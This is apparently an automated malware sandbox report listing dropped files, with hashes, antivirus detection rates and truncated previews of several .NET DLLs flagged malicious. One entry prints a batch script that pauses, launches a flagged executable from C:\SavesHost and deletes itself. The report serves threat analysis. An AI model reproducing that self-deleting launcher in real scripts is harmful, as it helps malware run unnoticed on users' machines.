                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):213
                                                                                            Entropy (8bit):5.27051352616303
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:hCijTg3Nou1SV+DEVkv7sKOZG1923f/gH:HTg9uYDEVkzywH
                                                                                            MD5:3D06CB26F9F6FFFE019EC7C6585CA3DF
                                                                                            SHA1:1811DDD40E0F8FB327EB478EC082B56CE83AB954
                                                                                            SHA-256:08AD3A8D18A9369768C4515CF421C28BC12A12A4C003E361D5AA04C1EDC670DA
                                                                                            SHA-512:5DE107BCBBCEF6C8E28D67B60D27A624E76BDD218EF84966083E95FAC3FBDEA089B413F67B3A03EE1AB98BEEEE7C0C916E5E761AD02326E018FEF44911239C1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\equVSDMYPr.bat"
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):34304
                                                                                            Entropy (8bit):5.618776214605176
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: 5b5HHFJ4F5.exe, Detection: malicious, Browse
                                                                                            • Filename: 8Y979B6CVq.exe, Detection: malicious, Browse
                                                                                            • Filename: 2uURPptBmx.exe, Detection: malicious, Browse
                                                                                            • Filename: Edk2E555BO.exe, Detection: malicious, Browse
                                                                                            • Filename: XkggQZnZYs.exe, Detection: malicious, Browse
                                                                                            • Filename: 63f29472e773f209f956ac819b94f41dae4fd3f0ed85d.exe, Detection: malicious, Browse
                                                                                            • Filename: 3Lw8TDhz3z.exe, Detection: malicious, Browse
                                                                                            • Filename: Lj4nhC1de2.exe, Detection: malicious, Browse
                                                                                            • Filename: J4eBFnLmWF.exe, Detection: malicious, Browse
                                                                                            • Filename: xkh7Uu17jK.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):38400
                                                                                            Entropy (8bit):5.699005826018714
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                            MD5:87765D141228784AE91334BAE25AD743
                                                                                            SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                            SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                            SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):40448
                                                                                            Entropy (8bit):5.7028690200758465
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                            MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                            SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                            SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                            SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):40448
                                                                                            Entropy (8bit):5.7028690200758465
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                            MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                            SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                            SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                            SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):41472
                                                                                            Entropy (8bit):5.6808219961645605
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                            MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                            SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                            SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                            SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):342528
                                                                                            Entropy (8bit):6.170134230759619
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                            MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                            SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                            SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                            SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):126976
                                                                                            Entropy (8bit):6.057993947082715
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                            MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                            SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                            SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                            SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                            Process:C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):23552
                                                                                            Entropy (8bit):5.519109060441589
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
